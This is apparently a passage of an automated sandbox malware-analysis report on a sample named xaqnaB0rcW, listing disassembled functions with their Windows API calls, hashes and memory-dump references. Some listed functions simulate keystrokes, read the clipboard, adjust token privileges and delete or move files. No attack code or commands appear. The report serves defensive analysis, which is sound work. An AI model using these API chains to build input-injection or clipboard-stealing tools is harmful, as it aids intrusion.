                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction ID: e6de2fb3c0769c2e192009dcc27c7134f7f2b69f17bc08fbe941052f28784a35
                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction Fuzzy Hash: 2531E7B8A00105DFC71ADF58C490969FBB6FF49340B65C6A5E409CB65ADB30EDC9CB80
                                                                  Function 003C9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: 59c341814cce17b4f4e1422640d768ca504f97b462f5449070d083ab2276043b
                                                                  • Instruction ID: fe86742d4e3fc9264b487dffdb188ea2efa1d4bc1375b3d397ff4f9a2e10d09d
                                                                  • Opcode Fuzzy Hash: 59c341814cce17b4f4e1422640d768ca504f97b462f5449070d083ab2276043b
                                                                  • Instruction Fuzzy Hash: 82415D705046518FDB26DF28C484B1ABBE0BF45308F19899CE99A8B766C372FC45CF52
                                                                  Function 003541A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00354214: FreeLibrary.KERNEL32(00000000,?), ref: 00354247
                                                                  • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003539FE,?,00000001), ref: 003541DB
                                                                    • Part of subcall function 00354291: FreeLibrary.KERNEL32(00000000), ref: 003542C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Free$Load
                                                                  • String ID:
                                                                  • API String ID: 2391024519-0
                                                                  • Opcode ID: 34cd209c16d1900bd115e1359c76de2c3820cc00d274ea11c26e25a71656a545
                                                                  • Instruction ID: ecf6739283e47d6c5a50588a36d957935cbc7954fa1810d1f3a30f055cd8a4ab
                                                                  • Opcode Fuzzy Hash: 34cd209c16d1900bd115e1359c76de2c3820cc00d274ea11c26e25a71656a545
                                                                  • Instruction Fuzzy Hash: 5B11EB31600315AACB1AAB70DC16F9D77A99F40705F10882DFD96AE1E1DB70DA889B50
                                                                  Function 003C9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: 7c0bc4b0b68d6edb5211066c7968099b5c49f30df7ee9d40805beef31d4de4c6
                                                                  • Instruction ID: f1e5debfba9a4a649cf5868ab8bd5da443085914371ce87905c15f184f41f6cf
                                                                  • Opcode Fuzzy Hash: 7c0bc4b0b68d6edb5211066c7968099b5c49f30df7ee9d40805beef31d4de4c6
                                                                  • Instruction Fuzzy Hash: B82157705086018FDB2ADF64C444B1BBBE1BF85304F158A6CEA964B665C732E845CF52
                                                                  Function 0037AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___lock_fhandle.LIBCMT ref: 0037AFC0
                                                                    • Part of subcall function 00377BDA: __getptd_noexit.LIBCMT ref: 00377BDA
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit$___lock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 1144279405-0
                                                                  • Opcode ID: faa8c95a7e1c2868b74749003246b58d895169cb2f20f0b71e86a82e0ac89eda
                                                                  • Instruction ID: eeab4ce25ffcc29a06ca8444e01b8109fdacc4664b4b8fc6b5e20f3872c3f0d1
                                                                  • Opcode Fuzzy Hash: faa8c95a7e1c2868b74749003246b58d895169cb2f20f0b71e86a82e0ac89eda
                                                                  • Instruction Fuzzy Hash: 0411B272805A049BD7336FA4CC4239DBA60AF81331F26C250E47C5F1E2C7BC8D108BA2
                                                                  Function 003539DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                  • Instruction ID: 5c4beff52e2f9d00b4948871cf39c4d0a1b82133b3cc28d961577dea21b10be9
                                                                  • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                  • Instruction Fuzzy Hash: 6E01E67150010DAEDF0AEFA5C891CEEBB78AF11344F108169B9569B1A5EA309A8DDF60
                                                                  Function 00372AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __lock_file.LIBCMT ref: 00372AED
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2597487223-0
                                                                  • Opcode ID: 077ca2d7936788f5841a1cc4016289af1c38a33b885dd4a39772362efdac3d86
                                                                  • Instruction ID: 79ebaa8f849ddbdc27efeccdc9124190249fd438feb7a7cf6fb7a06261c73916
                                                                  • Opcode Fuzzy Hash: 077ca2d7936788f5841a1cc4016289af1c38a33b885dd4a39772362efdac3d86
                                                                  • Instruction Fuzzy Hash: EAF06D31D00609AADF73AF798C0779F7AA5BF00320F16C415B41C9E191DB7C8A62DB91
                                                                  Function 00354252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,003539FE,?,00000001), ref: 00354286
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID:
                                                                  • API String ID: 3664257935-0
                                                                  • Opcode ID: 3b51cfae4fab4ed4393d5791ca347b09543f64730a5eb46e5dc38dbfec6fb51a
                                                                  • Instruction ID: 3325365a7418219a967f4463cbb646806236de03bcfdbe4e202014024019e08c
                                                                  • Opcode Fuzzy Hash: 3b51cfae4fab4ed4393d5791ca347b09543f64730a5eb46e5dc38dbfec6fb51a
                                                                  • Instruction Fuzzy Hash: 79F01C71505721DFCB3A9F64D490C16B7F4AF0432A7258E2EF5D686920C7319888DF50
                                                                  Function 003540A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003540C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: LongNamePath
                                                                  • String ID:
                                                                  • API String ID: 82841172-0
                                                                  • Opcode ID: 4594daa009145766b9d34d1b4ed3f6e0f496af0a5e5402dc4ad9852eddf2f1a9
                                                                  • Instruction ID: 5d1a92c7fa0bbc40f5da9aa711794e6159847a63ae2250d3796ad4dae6ba892c
                                                                  • Opcode Fuzzy Hash: 4594daa009145766b9d34d1b4ed3f6e0f496af0a5e5402dc4ad9852eddf2f1a9
                                                                  • Instruction Fuzzy Hash: 7BE07D335001241BC7129364CC42FEA339CDF88790F050071F908DB204D96499808690
                                                                  Function 00FD8DD4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000001F4), ref: 00FD8DE9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1350999171.0000000000FD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FD6000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd6000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                  • Instruction ID: c7a7c4ec59a2c06ca6406abdca311c5c884c5bad75d950d715c822fa16f91b01
                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                  • Instruction Fuzzy Hash: 93E0BF7494010DEFDB00DFE4D6496DE7BB4EF04311F1006A1FD05D7680DB309E549A62
                                                                  Function 00FD8DD8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000001F4), ref: 00FD8DE9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1350999171.0000000000FD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FD6000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd6000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                  • Instruction ID: d0842c15d55caef5809dceb04d3481a018bd077bafb3b28acb4463bc8e6047ec
                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                  • Instruction Fuzzy Hash: E7E0E67494010DDFDB00DFF4D64969E7BB4EF04301F100661FD01D2280DA309E509A62

                                                                  Non-executed Functions

                                                                  Function 003BAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 003BB1CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: %d/%02d/%02d
                                                                  • API String ID: 3850602802-328681919
                                                                  • Opcode ID: b071e7310437630eb708fc3cd6c865e4d790396ddd250868a652b0547734bca2
                                                                  • Instruction ID: 4dbe79f117dc80ca6b775e31a216fdf95b4fd065366e55b090c7e809c4f5919c
                                                                  • Opcode Fuzzy Hash: b071e7310437630eb708fc3cd6c865e4d790396ddd250868a652b0547734bca2
                                                                  • Instruction Fuzzy Hash: CD12D271500608ABEB269F68DC49FEEBBB8FF45714F10411AFA15DBAD1DBB08901CB51
                                                                  Function 0036EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 0036EB4A
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C3AEA
                                                                  • IsIconic.USER32(000000FF), ref: 003C3AF3
                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 003C3B00
                                                                  • SetForegroundWindow.USER32(000000FF), ref: 003C3B0A
                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003C3B20
                                                                  • GetCurrentThreadId.KERNEL32 ref: 003C3B27
                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 003C3B33
                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003C3B44
                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003C3B4C
                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 003C3B54
                                                                  • SetForegroundWindow.USER32(000000FF), ref: 003C3B57
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 003C3B6C
                                                                  • keybd_event.USER32(00000012,00000000), ref: 003C3B77
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 003C3B81
                                                                  • keybd_event.USER32(00000012,00000000), ref: 003C3B86
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 003C3B8F
                                                                  • keybd_event.USER32(00000012,00000000), ref: 003C3B94
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 003C3B9E
                                                                  • keybd_event.USER32(00000012,00000000), ref: 003C3BA3
                                                                  • SetForegroundWindow.USER32(000000FF), ref: 003C3BA6
                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 003C3BCD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 4125248594-2988720461
                                                                  • Opcode ID: 20b8296922e2771c28d325ca4f60ec5466265557ba12e7c0332e251f99bc74a3
                                                                  • Instruction ID: f91d3b8eb20ce9c4101f6c60f2299f014761e3655492d62992d82e2301ab6819
                                                                  • Opcode Fuzzy Hash: 20b8296922e2771c28d325ca4f60ec5466265557ba12e7c0332e251f99bc74a3
                                                                  • Instruction Fuzzy Hash: A631A971A403187BEB225F75AC49F7F7F6CEB44B50F118016FA05EA1D0D6B09D109BA0
                                                                  Function 0038ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0038B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0038B180
                                                                    • Part of subcall function 0038B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0038B1AD
                                                                    • Part of subcall function 0038B134: GetLastError.KERNEL32 ref: 0038B1BA
                                                                  • _memset.LIBCMT ref: 0038AD08
                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0038AD5A
                                                                  • CloseHandle.KERNEL32(?), ref: 0038AD6B
                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0038AD82
                                                                  • GetProcessWindowStation.USER32 ref: 0038AD9B
                                                                  • SetProcessWindowStation.USER32(00000000), ref: 0038ADA5
                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0038ADBF
                                                                    • Part of subcall function 0038AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0038ACC0), ref: 0038AB99
                                                                    • Part of subcall function 0038AB84: CloseHandle.KERNEL32(?,?,0038ACC0), ref: 0038ABAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                  • String ID: $H*@$default$winsta0
                                                                  • API String ID: 2063423040-243554728
                                                                  • Opcode ID: 9ec706858af15ce9fd7c15adc4c172cd50366b00da3c4171911f6cb6c28bc7c3
                                                                  • Instruction ID: 0615d54eccbd434c07a08d5884bbb95f68d18fbe40f66c9d85b1a2353ee23c2e
                                                                  • Opcode Fuzzy Hash: 9ec706858af15ce9fd7c15adc4c172cd50366b00da3c4171911f6cb6c28bc7c3
                                                                  • Instruction Fuzzy Hash: 5881ADB180130DAFEF12AFA4DC48AEEBB78EF08344F04419AF914A61A0D7319E54DB61
                                                                  Function 003960DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00396EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00395FA6,?), ref: 00396ED8
                                                                    • Part of subcall function 00396EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00395FA6,?), ref: 00396EF1
                                                                    • Part of subcall function 0039725E: __wsplitpath.LIBCMT ref: 0039727B
                                                                    • Part of subcall function 0039725E: __wsplitpath.LIBCMT ref: 0039728E
                                                                    • Part of subcall function 003972CB: GetFileAttributesW.KERNEL32(?,00396019), ref: 003972CC
                                                                  • _wcscat.LIBCMT ref: 00396149
                                                                  • _wcscat.LIBCMT ref: 00396167
                                                                  • __wsplitpath.LIBCMT ref: 0039618E
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 003961A4
                                                                  • _wcscpy.LIBCMT ref: 00396209
                                                                  • _wcscat.LIBCMT ref: 0039621C
                                                                  • _wcscat.LIBCMT ref: 0039622F
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0039625D
                                                                  • DeleteFileW.KERNEL32(?), ref: 0039626E
                                                                  • MoveFileW.KERNEL32(?,?), ref: 00396289
                                                                  • MoveFileW.KERNEL32(?,?), ref: 00396298
                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 003962AD
                                                                  • DeleteFileW.KERNEL32(?), ref: 003962BE
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 003962E1
                                                                  • FindClose.KERNEL32(00000000), ref: 003962FD
                                                                  • FindClose.KERNEL32(00000000), ref: 0039630B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                  • String ID: \*.*
                                                                  • API String ID: 1917200108-1173974218
                                                                  • Opcode ID: 818bc977d7e80914eb3f9084a9af49c9f8a223790e9e3cb0138406739cd3767b
                                                                  • Instruction ID: f4ac923d208b445c21f7bec008980ad77507e63b72f259dc8df5b622758a91ea
                                                                  • Opcode Fuzzy Hash: 818bc977d7e80914eb3f9084a9af49c9f8a223790e9e3cb0138406739cd3767b
                                                                  • Instruction Fuzzy Hash: 4151617280911CAACF22EBA1DC45DEF77BCAF05300F0944E6E589E7141DE3697498FA4
                                                                  Function 003A6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenClipboard.USER32(003EDC00), ref: 003A6B36
                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 003A6B44
                                                                  • GetClipboardData.USER32(0000000D), ref: 003A6B4C
                                                                  • CloseClipboard.USER32 ref: 003A6B58
                                                                  • GlobalLock.KERNEL32(00000000), ref: 003A6B74
                                                                  • CloseClipboard.USER32 ref: 003A6B7E
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 003A6B93
                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 003A6BA0
                                                                  • GetClipboardData.USER32(00000001), ref: 003A6BA8
                                                                  • GlobalLock.KERNEL32(00000000), ref: 003A6BB5
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 003A6BE9
                                                                  • CloseClipboard.USER32 ref: 003A6CF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
